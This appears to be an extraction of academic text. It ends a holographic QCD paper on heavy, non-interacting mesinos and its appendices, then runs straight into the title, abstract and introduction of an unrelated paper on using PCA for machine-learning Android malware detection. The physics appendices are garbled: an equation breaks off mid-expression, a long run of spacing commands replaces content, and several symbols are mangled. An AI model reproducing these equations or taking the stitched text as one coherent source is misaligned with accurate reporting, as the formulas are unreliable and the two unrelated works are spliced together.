\[\xi(r\sim r_{h})=e^{-\frac{1}{2}r\left(\sqrt{c^{2}-4G}+c\right)} \Bigg{[}c_{1}U\left(\frac{b\left(c+\sqrt{c^{2}-4G}\right)-2f}{2\sqrt{c^{2}-4G}},b, \sqrt{c^{2}-4G}(r-r_{h})\right)+c_{2}L_{\frac{2f-b\left(c+\sqrt{c^{2}-4G} \right)}{2\sqrt{c^{2}-4G}}}^{b-1}\left(\sqrt{c^{2}-4G}(r-r_{h})\right)\right] \Bigg{]}. \tag{71}\] In the context of the radial profile functions of vector mesons [19], and mesinos at \(T>T_{c}\) in equation (27), after appropriate coordinate redefinitions, the near-horizon (IR) solutions are also given in terms of the Tricomi Hypergeometric and Associate Laguerre functions. ## 8 Summary The immensely popular holographic QCD dual of [8] suffered from the longstanding problem that the Mesinos were nearly isospectral with the mesons, with non-vanishing/un(large-\(N\)-)suppressed mesino-mesino-meson interaction [9]- both in direct conflict with real QCD. What we show is that using the type IIA Strominger-Yau-Zaslow mirror of the UV-complete [2] (unlike [8] which caters only to the IR) as constructed in [1] inclusive of \(\mathcal{O}(R^{4})\) corrections worked out in [3], not only is it possible to have super-massive mesinos that do not interact with the mesons, the results obtained (mesino wave function, mass, mesino-mesino-meson interaction) receive no \(\mathcal{O}(R^{4})\) corrections up to \(\mathcal{O}\left(\frac{l_{0}^{6}}{N^{a}}\right),\alpha\geq 1\). Thus, the _"WISP"(Weakly Interacting Super-massive Particles)y mesinos and non-renormalization of their wave functions and mass up to \(\mathcal{O}(R^{4})\), together, apart from solving a longstanding problem, also provide a major and new insight into the fermionic sector of top-down holographic duals close to real thermal QCD._ Further, the product of the quark mass and chiral condensate may be conjectured to correspond to the coefficient of the leading non-constant term in the flavor \(D6\)-branes' embedding's fluctuation, with the RG-invariance of the former [27] corresponding to the non-renormalization up to \(\mathcal{O}(R^{4})\) of the latter. In the end, we would also point out that there is a rather intriguing wave-function universality in the form of the appearance of (appropriate) Tricomi Hypergeometric and Associate Laguerre function in the glueball/meson/graviton (apart from mesinoic) spectroscopies. ### Acknowledgements AM is partly supported by a Core Research Grant number SER-1829-PHY from the Science and Engineering Research Board, Govt. of India. GY is supported by a Senior Research Fellowship (SRF) from the Council of Scientific and Industrial Research, Govt. of India. We thank Nick Evans for a useful clarification. GY thanks the Infosys Foundation for the partial support at CMI. Finite Baryon Chemical Potential We explicitly show the generation of a finite baryon chemical potential. From equation (27) (\(f(r)\) being valid \(\forall r\)), up to LO in N, \(k^{\rm UV}(r)=1-3\frac{a^{2}}{r^{2}},f(r)=\frac{2N^{2/5}r^{6}}{729\pi g_{s} \alpha_{1}^{3}\alpha_{2}^{3}}\) and integrating \(\frac{\kappa\sqrt{k^{\rm UV}(r)}}{\sqrt{\kappa^{2}+f^{2}(r)}}\), one obtains: \[A_{t}(r\in{\rm UV})\sim\frac{1}{\sqrt{i\left(r^{2}-3a^{2}\right)}}\] \[\times\Bigg{\{}(-1)^{2/3}\sqrt[4]{3}a\sqrt{1-\frac{3a^{2}}{r^{2}} }\Bigg{(}F\left[\sin^{-1}\left(\frac{3^{3/4}\sqrt[4]{\kappa}\sqrt[4]{\frac{ \kappa}{2}}\sqrt{i\left(r^{2}-3a^{2}\right)}\sqrt[4]{g_{s}}\alpha_{1}^{2/3} \sqrt[4]{\alpha_{2}}}{ar^{\frac{1}{3}}\sqrt[4]{\alpha_{2}}}\right)|\frac{1}{2 }\left(1-i\sqrt{3}\right)\right]\] \[-\Pi\left[\frac{3a^{2/3}\kappa^{2/3}\sqrt[4]{\kappa}\sqrt[4]{g_{ s}}\alpha_{1}^{4/3}\alpha_{2}^{2/3}}{a^{2}N^{2/15}};\sin^{-1}\left(\frac{3^{3/4} \sqrt[4]{\kappa}\sqrt[4]{\kappa}\sqrt[4]{\frac{\kappa}{2}}\sqrt[4]{i\left(r^ {2}-3a^{2}\right)}\sqrt[4]{g_{s}}\alpha_{b_{1}}^{2/3}\sqrt[4]{\alpha_{2}}}{ ar^{\frac{1}{3}}\sqrt[4]{N}}\right)|\frac{1}{2}\left(1-i\sqrt{3}\right)\right] \Bigg{\}}\] \[\sim\frac{3\kappa\sqrt{\pi}\alpha_{\Theta_{1}}^{2}\alpha_{\Theta_ {2}}\left(1-\frac{3a^{2}}{r^{2}}\right)^{3/2}\sqrt{g_{s}}}{\sqrt{2}a^{2}\sqrt [4]{N}},\] (A1) \(F(\phi|\mu)\equiv\int_{0}^{\phi}\frac{d\alpha}{\sqrt{1-m^{2}\sin^{2}\alpha}}\), being the incomplete elliptic integral of the first kind, and \(\Pi(\nu;\phi|\mu)\equiv\int_{0}^{\phi}\frac{d\alpha}{(1-\nu^{2}\sin^{2}\alpha )\sqrt{1-\mu^{2}\sin^{2}\alpha}}\) being the incomplete integral of the fourth kind, generating a finite baryon chemical potential: \[\mu=\frac{3\sqrt{\pi}\kappa\alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}\sqrt{g _{s}}}{\sqrt{2}a^{2}\sqrt[4]{N}}.\] (A2) ## Appendix B EOM-Related for Massive Mesinos The EOM for the radial profile \(R_{2,n}(r)\) of the Mesino \(\Theta\), as defined in equation (26), is given by: \[\frac{\Gamma^{\underline{1}\underline{2}}E_{\underline{1}}^{*}(r) R_{2,n}^{\prime}(r)}{E_{\underline{1}}^{*}(r)}\Theta_{2,0}+R_{2,n}^{\prime}(r) \left(\Gamma^{\underline{1}\underline{5}}\left(\frac{E_{\underline{1}}^{*}(r) }{E_{\underline{1}}^{*}(r)}\right)^{\prime}-\frac{\Gamma^{\underline{1} \underline{2}}ip\ E_{\underline{2}}^{*^{2}}(r)}{E_{\underline{1}}^{*}(r)}- \frac{\Gamma^{\underline{1}\underline{2}}}{\omega_{r}^{\underline{8}}\ 10}(r)+2\pi i(2n+1)T\right)\Theta_{2,0}\] \[+R_{2,n}(r)\bigg{(}-\frac{\pi^{2}\Gamma^{\underline{1}\underline {5}}(2n+1)^{2}T^{2}E_{\underline{1}}^{*}(r)}{E_{\underline{1}}^{*}(r)}+\frac{ \pi\Gamma^{\underline{1}\underline{2}\underline{5}}(2n+1)p\ TE_{\underline{2}}^{*^ {2}}(r)}{E_{\underline{2}}^{*}(r)}+\frac{\Gamma^{\underline{1}\underline{2} ip}\ E_{\underline{2}}^{*^{2}}(r)\mathcal{J}^{\prime}(r)}{E_{\underline{1}}^{*}(r) \mathcal{J}(r)}\] \[+\frac{\Gamma^{\underline{1}\underline{5}}p\ ^{2}E_{\underline{2}}^{*^{2}}(r)^{2}}{E_{ \underline{1}}^{*}(r)^{2}}\omega_{r}^{\underline{9}\ 10}-\frac{\pi\Gamma^{\underline{2}\underline{5}}(2n+1) ip\ TE_{\underline{2}}^{*^{2}}(r)}{E_{\underline{1}}^{*}(r)}\frac{\omega_{r}^{\underline{ 4}\ 10}}{\mathcal{J}(r)}-\frac{\pi i(2n+1)T\mathcal{J}^{\prime}(r)}{\mathcal{J}(r)}+ \mathcal{J}(r)\omega_{r}^{\underline{9}\ 10}(r)\Gamma^{\underline{1}\underline{5}}-i\pi\left(\frac{E_{ \underline{2}}^{*^{2}}}{E_{\underline{1}}^{*}}\right)^{\prime}\Gamma^{ \underline{1}\underline{2}}\bigg{)}\Theta_{2,0}=0,\] (B1) with \(a=7,8\) respectively for the TH, BH backgrounds with suitable aforementioned definitions for \(\mathcal{J}(r)\). * \(T<T_{c}\): Writing \(M_{\rm Mesino}=\tilde{M}_{\rm Mesino}\frac{r_{0}}{\sqrt{g_{s}N}}\), the constants appearing in the Schrodinger-like EOM (30)-(32), are given as under: \[a_{1}\equiv\frac{r_{0}^{2}}{\sqrt{3\pi g_{s}N}};\ a_{2}\equiv\frac{23r_{0}}{12 \sqrt{3\pi g_{s}N}};\ b_{1}\equiv\frac{23r_{0}}{12\sqrt{3\pi g_{s}N}};\ b_{6} \equiv-\frac{23\sqrt{\pi}g_{s}N}{4\sqrt{3}r_{0}^{3}},\] \[{\cal A}_{\Theta_{2}^{\prime}}\equiv-\frac{1511.7\sqrt{r_{0}} \alpha_{\theta_{2}}}{{g_{s}}^{7/2}\kappa_{2}\log NMN^{2}{V_{f}}^{2}\alpha_{ \theta_{1}}^{2}},\] \[{\cal B}_{\Theta_{2}^{\prime}}\equiv a_{2}+\frac{2^{3/2}\tilde{M}_{ \rm Mesino}\pi^{1/4}}{\left(g_{s}N\right)^{1/4}}+2i(2n+1)\pi T,\] \[{\cal A}_{\Theta_{2}}\equiv\frac{-\frac{39.4\tilde{M}_{\rm Mesino }}{\sqrt{g_{s}}\sqrt{N}}+T\left(n(-39.5a_{6}^{\beta}r_{0}T-(125i))-(62.5i)-39.5 a_{6}^{\beta}n^{2}r_{0}T-9.9a_{6}^{\beta}r_{0}T\right)}{r_{0}},\] \[{\cal B}_{\Theta_{2}}\equiv\frac{M\left(\lambda_{5}^{2}{g_{s}}^{1 5/4}\kappa_{2}^{2}\log N^{2}\tilde{M}_{\rm Mesino}(0.1n+0.1)N^{3/20}{N_{f}}^{2 }{r_{0}}^{4}T\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{8}-1.1\lambda_{5}{g_ {s}}^{3/2}\kappa_{2}\log N\tilde{M}_{\rm Mesino}^{2}{N_{f}}{r_{0}}^{2}\alpha _{\theta_{2}}\alpha_{\theta_{1}}^{4}+6.84N^{3/5}\right)}{\lambda_{5}^{2}\sqrt{ g_{s}}\kappa_{2}\log N{r_{0}}^{11/2}\alpha_{\theta_{1}}^{6}\alpha_{\theta_{2}}^{ 3}},\] \[{\cal C}_{\Theta_{2}}\equiv\frac{\frac{786.1\tilde{M}_{\rm Mesino }}{\sqrt{g_{s}}\sqrt{N}}+T\left(n\left(-39.5b_{6}{r_{0}}^{2}T+(0.\ +2485.6i)\right)+(1242.8i)-39.5b_{6}n^{2}{r_{0}}^{2}T-9.9b_{6}{r_{0}}^{2}T\right) }{{r_{0}}^{2}},\] (B2) \[\lambda_{5}\] being the parameter in terms of which the co-frames of the relevant non-Kahler six-folds were worked out in [3], \(g_{\theta_{2}\theta_{2}}^{\rm IIA}(r\sim r_{0})\sim\kappa_{2}\sqrt{g_{s}N}\) and, \[a_{6}^{\beta}\equiv\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{{r_{0}}^{2}}+\frac{ \beta\sqrt{g_{s}}M\left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642\alpha_{ \theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4}\right) \log^{3}(r_{0})}{4374\sqrt{\pi}\epsilon^{5}\log N^{4}N^{3/4}{N_{f}}{r_{0}}^{4 }\alpha_{\theta_{2}}^{3}}.\] (B3) * \(T>T_{c}\): Based on \[E_{\Xi}^{r}=\frac{\sqrt{\frac{9a_{2}^{2}+r^{2}}{6a^{2}+r^{2}}}\sqrt{ r^{4}-{r_{h}}^{4}}\left(1-\frac{1}{2}\beta\left({\cal C}_{zz}-2{\cal C}_{ \theta_{1}z}+2{\cal C}_{\theta_{1}z}\right)\right)}{\sqrt{2}\sqrt[4]{\pi}\sqrt {g_{s}}\sqrt{N}r},\] \[E_{\Xi}^{t}=\frac{\sqrt{2}\sqrt{\pi}\sqrt[4]{g_{s}}\sqrt{N}r}{ \sqrt{r^{4}-{r_{h}}^{4}}}+\frac{27\left(9b^{2}+1\right)^{4}\beta b^{10}\sqrt {g_{s}}Mr^{2}\Sigma\left(6a^{2}+{r_{h}}^{2}\right)(r-2r_{h})\log^{3}(r_{h})}{ 2\sqrt{2}\pi^{3/4}\left(3b^{2}-1\right)^{5}\left(6b^{2}+1\right)^{4}\log N^{4 }NN{f_{h}}^{4}\alpha_{\theta_{2}}^{3}\left(9a^{2}+{r_{h}}^{2}\right)\sqrt{r^{4 }-{r_{h}}^{4}}},\] \[\omega_{r}^{\frac{8}{2}\ 10}=-\frac{7N^{3/5}}{\lambda_{5}{g_{s}}^{3/2} \kappa_{2}\log NN_{f}r^{2}\alpha_{\theta_{1}}^{4}\alpha_{\theta_{2}}\left(r^{2} -3.3a^{2}\right)}\] \[+\frac{\kappa_{\frac{8}{2}\ 10}a^{8}\sqrt{\beta}\sqrt{{\cal C}_{ zz}}{\rm const}\lambda_{5}{g_{s}}^{5/4}MN^{19/20}N_{f}\sqrt{\alpha_{\theta_{1}}} \sqrt{1-\frac{{r_{h}}^{4}}{r^{4}}}\log(r)}{r^{4}\alpha_{\theta_{2}}^{6}\left( r^{2}-3.a^{2}\right)^{2}\sqrt{\frac{6a^{2}+r^{2}}{9a^{2}+r^{2}}}},\] (B4) with \(\Sigma\equiv-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{4}\), and setting consistently the \({\cal O}(R^{4})\) corrections of \({\cal M}\)-theory's three-form potential to zero requires: \({\cal C}_{zz}-2{\cal C}_{\theta_{1}z}=0\) and \(|{\cal C}_{\theta_{1}x}|\ll 1\)[3], we see that \(E_{\Xi}^{r}\) receives no \({\cal O}(\beta)\) corrections. Further, the constants appearing in the EOM for massive mesinos are therefore given below: \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E_{ \text{L}}^{\text{T}}}} =\frac{\beta\sqrt{g_{s}}M\left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4 }\right)\log^{3}(r_{h})}{17496\sqrt{\pi}e^{5}\left(\log N\right)^{4}N^{3/4}N_{ f}r_{h}{}^{3}\alpha_{\theta_{2}}^{3}}+\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{4r_{h}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\left(\frac{E_{\text{L}}^{\text{ T}}}{E_{\text{L}}^{\text{T}}}\right)^{\prime}} =\frac{2\beta M\left(-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{ 4}\right)\log^{3}(r_{h})}{6561\pi^{3/2}e^{5}\sqrt{g_{s}}\left(\log N\right)^{4} N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}}+\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{rt} =-\frac{14}{3\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}+\frac{4\beta M\left(-19683 \sqrt{6}\alpha_{\theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}} ^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{4}\right)\sqrt{\frac{6a^{2}+r_{h}{}^{2}}{ 9a^{2}+r_{h}{}^{2}}}\log^{3}(r_{h})}{6561\sqrt{3}\pi^{3/2}e^{5}\sqrt{g_{s}} \left(\log N\right)^{4}N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{2\sqrt{2}\sqrt[4]{\pi}\sqrt{g_{s}}\sqrt{N}}{\sqrt{r_{h}{}^{3}}}- \frac{4\sqrt{\frac{2}{3}}\beta\sqrt[4]{g_{s}}M\left(-19683\sqrt{6}\alpha_{ \theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6} \alpha_{\theta_{2}}^{4}\right)\left(6a^{2}+r_{h}{}^{2}\right)\log^{3}(r_{h})} {6561\pi^{3/4}e^{5}\left(\log N\right)^{4}NN_{f}r_{h}{}^{7}/{}^{2}\alpha_{ \theta_{2}}^{3}\left(9a^{2}+r_{h}{}^{2}\right)},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{\sqrt{\frac{2}{2}}\pi^{3/4}{g_{s}}^{{}^{3/4}}N^{3/4}}{r_{h}{}^{3/2}}+ \frac{{\beta g_{s}}^{{}^{3/4}}M\sqrt{\frac{1}{N}}\left(19683\sqrt{6}\alpha_{ \theta_{1}}^{6}+6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6} \alpha_{\theta_{2}}^{4}\right)\log^{3}(r_{h})}{2187\sqrt{2}\sqrt{\pi}e^{5} \left(\log N\right)^{4}N_{f}r_{h}{}^{7}/{}^{2}\alpha_{\theta_{2}}^{3}},\] \[a_{2}^{M_{\text{Mquino}}}_{\beta} \equiv-\frac{21.9}{\sqrt{g_{s}N}}+\mathcal{C}^{M_{\text{Mquino}}}_{rt}\] \[\mathcal{A}^{M_{\text{Mquino}}}_{1} =\pi^{2}\left(-(2n+1)^{2}\right)T^{2}\left(\frac{\beta\sqrt{g_{s}}M \left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642\alpha_{\theta_{2}}^{2}\alpha_{ \theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4}\right)\log^{3}(r_{h})}{17496 \sqrt{\pi}e^{5}\left(\log N\right)^{4}N^{3/4}N_{f}r_{h}{}^{3}\alpha_{\theta_{2} }^{3}}\right.\] \[\left.+\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{4r_{h}}\right)-(0. +3.3i)(2n+1)T,\] \[\mathcal{A}^{M_{\text{Mquino}}}_{2} =\frac{2\beta M\left(-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{ 4}\right)\log^{3}(r_{h})}{6561\pi^{3/2}e^{5}\sqrt{g_{s}}\left(\log N\right)^{4 }N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}}-\frac{1.3r_{h}}{\sqrt{g_{s}}\sqrt{N }}+\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}+2i\pi(2n+1)T,\] \[\mathcal{B}^{M_{\text{Mquino}}}_{1} =1.1\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}}+(2n+1)T\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L} }^{\text{T}}}{E_{\text{L}}^{\text{T}}}}.\] (B5) Appendix C \(\tilde{z}=\)Constant Embedding of Flavor \(D6\)-Branes Inclusive of \(\mathcal{O}(\beta)\) Corrections The EOM for the embedding of the flavor \(D6\)-branes in the warped squashed resolved conifold \(\tilde{z}=\tilde{z}(r)=\tilde{z}_{(0)}+\beta\tilde{z}_{(1)}\), up to \(\mathcal{O}(\beta)\), is given by: \[\frac{N^{3/5}N_{f}r^{2}\left(r^{4}-r_{h}{}^{4}\right)\left(\log N-3 \log(r_{h})\right)\left(\tilde{z}^{\prime}_{(0)}+\beta\tilde{z}^{\prime}_{(1)} \right)}{4\sqrt{6}\pi^{7/4}{g_{s}}^{{}^{3/4}}\alpha_{\theta_{1}}^{2}\alpha_{ \theta_{2}}^{5/2}\sqrt{\frac{4\sqrt{\pi}\sqrt{g_{s}}^{{}^{2}}\alpha_{\theta_{2}}^{3} \left(6a^{2}+r^{2}\right)}{9a^{2}+r^{2}}+3\sqrt{3}N^{2/5}\left(r^{4}-r_{h}{}^{4} \right)\left(\tilde{z}^{\prime}_{(0)}+\beta\tilde{z}^{\prime}_{(1)}\right)^{2}}}\] \[-\frac{0.0005\beta MN^{87/20}r_{h}{}^{5}\left(-492.1\alpha_{ \theta_{1}}^{6}-67.8\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{6}+\alpha_{ \theta_{2}}^{4}\right)\left(r-r_{h}{}^{2}\log^{3}(r_{h})(\log N-3\log(r_{h})) \tilde{z}^{\prime}_{(0)}(r)\right.}{\epsilon^{5}{g_{s}}^{{}^{5/2}}\log N^{4} \alpha_{\theta_{1}}^{6}\alpha_{\theta_{2}}^{6}\left(9a^{2}+r_{h}{}^{2}\right)}=K^{(0 )}+\beta K^{(1)}.\] (C1) At \(\mathcal{O}(\beta^{0})\), (C1) yields: \[\tilde{z}^{\prime}_{(0)}=\pm\frac{8\sqrt{6}\pi^{2}{g_{s}}^{{}^{3/4}}K^{(0)} \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{5/2}\sqrt{\frac{\sqrt{g_{s}}\tau^{ 2}\alpha_{\theta_{2}}^{3}\left(6a^{2}+r^{2}\right)}{9a^{2}+r^ From (C2), one obtains \(\tilde{z}(r)\in\mathbb{R}\) if \(K^{(0)}=0\) (irrespective of whether one performs first a large-\(N\) followed by a small-\(r\) expansion or vice versa). In a similar manner, at \(\mathcal{O}(\beta)\), \[\tilde{z}_{(1)}=c_{1}\] \[\begin{split}& 4\pi^{2}g_{s}{}^{s/4}K^{(1)}r\alpha_{ \theta_{1}}^{2}\alpha_{\theta_{2}}^{11/2}\sqrt{6a^{2}+r^{2}}\\ &\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \ \[\mu_{2}\equiv\frac{2\sqrt{\mathcal{A}_{2}^{M_{\text{Mamino }}2}-2\mathcal{C}_{\frac{E_{1}^{ \text{T}}}{\mathcal{E}_{1}^{\text{T}}}}}^{\frac{1}{\mathcal{E}_{1}^{\text{T}}}} \frac{\mathcal{E}_{2}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}{\mathcal{C}_{ \frac{E_{1}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}^{\frac{M_{\text{Mamino }}}{\mathcal{E}_{1}^{\text{T}}}}}+1\] \[=1+4.9\sqrt{-(0.25\,+0.4i)n+(0.1\,-0.2i)-0.3n^{2}}+\mathcal{O}\left(\frac{ \beta\gamma}{\mathcal{N}^{5/4}}\right),\] \[\mu_{3}\equiv\frac{i\sqrt{6}\pi^{3/4}{g_{s}}^{3/4}N^{3/4}pu}{{r_{h}}^{5/2}}+ \frac{\frac{i\sqrt{2}{g_{s}}^{3/4}Mpu}{{r_{h}}^{2}}\left(19683\sqrt{6}\alpha_ {\text{g}_{s}}^{6}+6642\alpha_{\text{g}_{s}}^{2}\alpha_{\text{g}_{s}}^{3}-40 \sqrt{6}\alpha_{\text{g}_{s}}^{4}\right)\log^{3}(r_{h})}{2187\sqrt[4]{\pi} \epsilon^{5}\log N^{4}\sqrt{N}{f_{r}}{n}^{9/2}\alpha_{\text{g}_{s}}^{3}}\] \[\Lambda\equiv\mu_{1}-\frac{2i\mathcal{B}_{2}^{M_{\text{Mamino }}}}{\mathcal{C}_{\frac{E_{2}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}^{M_{ \text{Mamino}}}}=2.5\sqrt{-(0.3\,+0.4i)n+(0.1\,-0.2i)-0.3n^{2}}+(-0.9i)n+(1\,- 0.4i)+\mathcal{O}\left(\frac{\beta\gamma}{\mathcal{N}^{5/4}}\right).\] ## Appendix E Summary of Applications of Top-Down Holographic QCD [1, 3] One of the authors (AM) has been working on the top-down holographic QCD for the past few years. The holographic dual of finite \(N\) QCD was first constructed in [1] and then \(\mathcal{O}(R^{4})\) corrections to [1] were obtained in [3]. Following is the summary of results obtained in this direction. * **Summary of Applications of [1]**: In [15], transport coefficients such as shear viscosity, diffusion constant, electrical conductivity, charge susceptibility, etc., of black \(M3\)-banes (black \(M5\)-branes wrapping a homologous sum of two cycles) in the MQGP limit were obtained, and it was found that the ratio of shear viscosity-to-entropy density is \(1/4\pi\). In [12], deconfinement temperature and mass scale of the first generation quarks were obtained without the inclusion of \(\mathcal{O}(R^{4})\) corrections relevant to thermal QCD. Further, thermodynamic stability and \(G_{2}\) structure of [1] and temperature dependence of electrical conductivity and charge susceptibility were also discussed in [12, 29]. In this process, Einstein's law was verified by computing the ratio of electrical conductivity to charge susceptibility. For the discussion on Wiedemann-Franz law by calculating the thermal and electrical conductivities up to LO in \(N\) and NLO in \(N\) correction to the aforementioned transport coefficients and speed of sound from the gauge invariant metric perturbations, see [30]. The glueball and meson spectra of finite \(N\) QCD have been obtained in [22] and [19], respectively. Decay of glueballs into mesons (\(\pi\) and \(\rho\) mesons) has been discussed in [13] and for the QCD trace anomaly from \(\mathcal{M}\)-theory perspective, see [31]. * **Summary of Applications of [3]**: The low energy coupling constants at the NLO in chiral expansion of \(SU(3)\) chiral perturbation theory (for simplicity in the chiral limit) were obtained from the aforementioned type IIA dual, in [5] where we observed a _connection between higher derivative terms and large-\(N\) expansion_. In the process of computing the deconfinement temperature (\(T_{c}\)) in [25, 32], a _novel "UV-IR" mixing, non-renormalization \(T_{c}\) beyond one-loop in the zero instanton sector and "Flavor Memory" effect_ were obtained. Further, we constructed a doubly holographic setup with a non-conformal bath in [28] to get the Page curve of the related eternal black hole from a top-down approach. One of the exciting results that we obtained in [28] is the Page curve of the relevant eternal black hole for massless gravity on the Karch-Randall brane. Massless graviton was responsible for the exponential-in-\(N\) suppressed entanglement entropy from higher derivative terms in eleven-dimensional supergravity action. This provided us the _connection between the mass of graviton and higher derivative terms_. On the Math side with the aim of classifying non-supersymmetric thermal geometries relevant to realistic top-down holographic duals of thermal QCD-like theories, \(SU(3)/G_{2}/SU(4)/Spin(7)\)-structures and (Almost) Contact (3) (Metric) Structures on the underlying six-, seven- and eight-folds were studied in [3] and [10].
2301.06031
A Review on the effectiveness of Dimensional Reduction with Computational Forensics: An Application on Malware Analysis
The Android operating system is pervasively adopted as the operating system platform of choice for smart devices. However, the strong adoption has also resulted in exponential growth in the number of Android based malicious software or malware. To deal with such cyber threats as part of cyber investigation and digital forensics, computational techniques in the form of machine learning algorithms are applied for such malware identification, detection and forensics analysis. However, such Computational Forensics modelling techniques are constrained the volume, velocity, variety and veracity of the malware landscape. This in turn would affect its identification and detection effectiveness. Such consequence would inherently induce the question of sustainability with such solution approach. One approach to optimise effectiveness is to apply dimensional reduction techniques like Principal Component Analysis with the intent to enhance algorithmic performance. In this paper, we evaluate the effectiveness of the application of Principle Component Analysis on Computational Forensics task of detecting Android based malware. We applied our research hypothesis to three different datasets with different machine learning algorithms. Our research result showed that the dimensionally reduced dataset would result in a measure of degradation in accuracy performance.
Aye Thaw Da Naing, Justin Soh Beng Guan, Yarzar Shwe Win, Jonathan Pan
2023-01-15T07:34:31Z
http://arxiv.org/abs/2301.06031v1
A Review on the effectiveness of Dimensional Reduction with Computational Forensics: An Application on Malware Analysis ###### Abstract The Android operating system is pervasively adopted as the operating system platform of choice for smart devices like smartphones, tablets, home appliances and Internet of Things (IoTs). However, the strong adoption has also resulted in exponential growth in the number of Android based malicious software or malware. Such malwares typically embed themselves in their victims' devices and attack not only their victims but induce other targeted or collateral damages. To deal with such cyber threats as part of cyber investigation and digital forensics, computational techniques in the form of machine learning algorithms are applied for such malware identification, detection and forensics analysis. However, such Computational Forensics modelling techniques are constrained the volume, velocity, variety and veracity of the malware landscape. This in turn would affect its identification and detection effectiveness. Such consequence would inherently induce the question of sustainability with such solution approach. One approach to optimise effectiveness is to apply dimensional reduction techniques like Principal Component Analysis with the intent to enhance algorithmic performance. In this paper, we evaluate the effectiveness of the application of Principle Component Analysis on Computational Forensics task of detecting Android based malware. We applied our research hypothesis to three different datasets with different machine learning algorithms. Our research result showed that the dimensionally reduced dataset would result in a measure of degradation in accuracy performance. ## 2 Author Keywords Principal Component Analysis (PCA), Computational Forensics, Android Malware. ## 3 Introduction The Android operating system (OS) continues to dominate the market share of mobile devices around the world. Android OS has widely been used in automotive, IoT (Internet of Things) devices, home appliances and smart watch. With Android powered 